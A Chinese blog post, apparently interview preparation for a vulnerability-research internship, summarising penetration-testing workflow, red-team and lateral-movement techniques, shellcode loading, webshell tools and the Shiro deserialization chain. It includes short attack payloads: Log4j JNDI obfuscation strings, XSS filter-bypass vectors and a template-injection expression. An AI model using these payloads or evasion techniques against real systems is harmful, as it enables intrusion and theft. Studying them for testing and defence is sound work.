网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[1. 在XX实习时做了什么](#1. 在XX实习时做了什么)
[2. 渗透测试的思路简单描述](#2. 渗透测试的思路简单描述)
[3. 护网中承担什么角色](#3. 护网中承担什么角色)
[4. 红队一些攻击思路](#4. 红队一些攻击思路)
[5. 拿下系统如何横向](#5. 拿下系统如何横向)
[6. Log4j漏洞(CVE-2021-44228)研究](#6. Log4j漏洞(CVE-2021-44228)研究)
[7. 内存码(Shellcode Loader)了解](#7. 内存码(Shellcode Loader)了解)
[8. 冰蝎、哥斯拉工具分析](#8. 冰蝎、哥斯拉工具分析)
[9. 攻击队研究重点](#9. 攻击队研究重点)
[10. 擅长漏洞/攻击方向](#10. 擅长漏洞/攻击方向)
[11. Shiro反序列化漏洞解析](#11. Shiro反序列化漏洞解析)
[12. Bypass方法示例](#12. Bypass方法示例)
深某服-漏洞研究员实习
在XX实习时做了什么 渗透测试的思路简单描述 护网中承担什么角色 红队一些攻击思路 拿下系统如何横向 前段时间的那个log4j有研究吗,可以简单说一下吗 (接上)有哪些混淆绕过的方法 内存码有没有了解 冰蝎、哥斯拉这些工具有没有了解过 做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的 那么多漏洞和攻击,比较擅长哪一个 说下shiro反序列化的形成原因、利用链 对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。
1. 在XX实习时做了什么
在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:
- 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
- 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
- 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
- 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。
2. 渗透测试的思路简单描述
渗透测试核心流程分五阶段:
- 信息收集 :
- 子域名枚举(如
subfinder
)、端口扫描(nmap
)、指纹识别(Wappalyzer
)。- 敏感信息泄露(GitHub源码、备份文件、配置文件)。
- 漏洞扫描与验证 :
- 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
- 权限提升 :
- 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
- 横向移动 :
- 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
- 报告输出 :
- 输出漏洞详情、攻击路径图及修复建议。
3. 护网中承担什么角色
- 攻击队角色 :
- 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
- 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
- 防守经验 :
- 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
- 协助处置应急事件(如Webshell查杀、日志溯源)。
4. 红队一些攻击思路
初始入侵阶段:
- 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
- 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。
横向扩展阶段:
- 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
- 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。
5. 拿下系统如何横向
横向移动关键步骤:
- 信息收集 :
- 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
- 凭证利用 :
- Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
- 协议漏洞 :
- 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
- 隐蔽通道 :
- 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。
6. Log4j漏洞(CVE-2021-44228)研究
原理 :Log4j 2.x版本解析日志时,未对
${jndi:ldap://xxx}
等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。混淆绕过方法:
- 环境变量注入 :
${${env:XXX:-j}ndi:ldap://xxx}
(利用默认值覆盖)。- Lower/Upper关键字 :
${jNdi:ldap://xxx}
(大小写绕过)。- 嵌套表达式 :
${${::-j}ndi:ldap://xxx}
(特殊符号替换)。- 绕过高版本限制 :利用上下文变量(如
${ctx:xxx}
)拼接攻击载荷。
7. 内存码(Shellcode Loader)了解
- 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
- 常见技术 :
- 反射型DLL注入 :通过
VirtualAlloc
分配内存并执行。- 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
- 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。
8. 冰蝎、哥斯拉工具分析
- 冰蝎(Behinder) :
- 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
- 检测难点 :特征为固定
UA头
和Content-Type: application/octet-stream
。- 哥斯拉(Godzilla) :
- 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
- 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。
9. 攻击队研究重点
- 工具武器化 :
- 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
- 开发轻量级漏洞利用工具(如Fastjson一键利用)。
- 流量混淆 :
- 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
- 供应链攻击 :
- 研究第三方组件漏洞(如npm包、Docker镜像投毒)。
10. 擅长漏洞/攻击方向
反序列化漏洞:
- 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
- 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。
11. Shiro反序列化漏洞解析
形成原因:
- Shiro使用硬编码AES密钥加密
RememberMe
字段,攻击者通过伪造Cookie触发反序列化。- 反序列化入口点:
AbstractRememberMeManager#decrypt
方法。利用链(以CommonsBeanutils为例):
- 触发点 :恶意Cookie → AES解密 → 反序列化 → 调用
BeanComparator.compare()
。- 利用链 :通过
PropertyUtils.getProperty()
触发任意Getter方法,最终执行TemplatesImpl
加载字节码。
12. Bypass方法示例
常见绕过姿势:
- 编码混淆 :URL编码、Unicode转义(如
<img src=x onerror=alert(1)>
→\u003cimg\u0020src=x...
)。- 关键字分割 :利用注释符或拼接(如
<svg/onload=alert``(1)>
)。- 协议特性 :
- HTTP参数污染(HPP):
param=1¶m=payload
触发解析差异。- 特殊符号:
${1+1}
在Thymeleaf等模板引擎中执行表达式。